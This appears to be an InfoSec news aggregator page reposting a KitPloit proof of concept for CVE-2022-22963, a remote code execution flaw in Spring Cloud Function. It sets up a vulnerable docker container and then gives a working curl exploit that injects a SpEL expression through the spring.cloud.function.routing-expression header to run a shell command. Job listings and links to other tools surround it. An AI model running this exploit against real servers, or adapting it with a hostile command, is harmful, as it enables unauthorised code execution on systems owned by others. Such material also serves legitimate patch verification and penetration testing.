all InfoSec news
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
March 31, 2022, 11:30 a.m. | noreply@blogger.com (Unknown)
KitPloit - PenTest Tools! www.kitploit.com
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit
Curl command:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp suite:
Credits
https://github.com/hktalent/spring-spel-0day-poc
Download CVE-2022-22963
burp code code execution container cve cve-2022-22963 exposing framework java poc remote code execution spring vulnerability vulnerable
More from www.kitploit.com / KitPloit - PenTest Tools!
HackerInfo - Infromations Web Application Security
2 days, 14 hours ago |
www.kitploit.com
VectorKernel - PoCs For Kernelmode Rootkit Techniques Research
1 week, 1 day ago |
www.kitploit.com
Jobs in InfoSec / Cybersecurity
SOC 2 Manager, Audit and Certification
@ Deloitte | US and CA Multiple Locations
Security Engineer 2
@ Oracle | BENGALURU, KARNATAKA, India
Oracle EBS DevSecOps Developer
@ Accenture Federal Services | Arlington, VA
Information Security GRC Specialist - Risk Program Lead
@ Western Digital | Irvine, CA, United States
Senior Cyber Operations Planner (15.09)
@ OCT Consulting, LLC | Washington, District of Columbia, United States
AI Cybersecurity Architect
@ FactSet | India, Hyderabad, DVS, SEZ-1 – Orion B4; FL 7,8,9,11 (Hyderabad - Divyasree 3)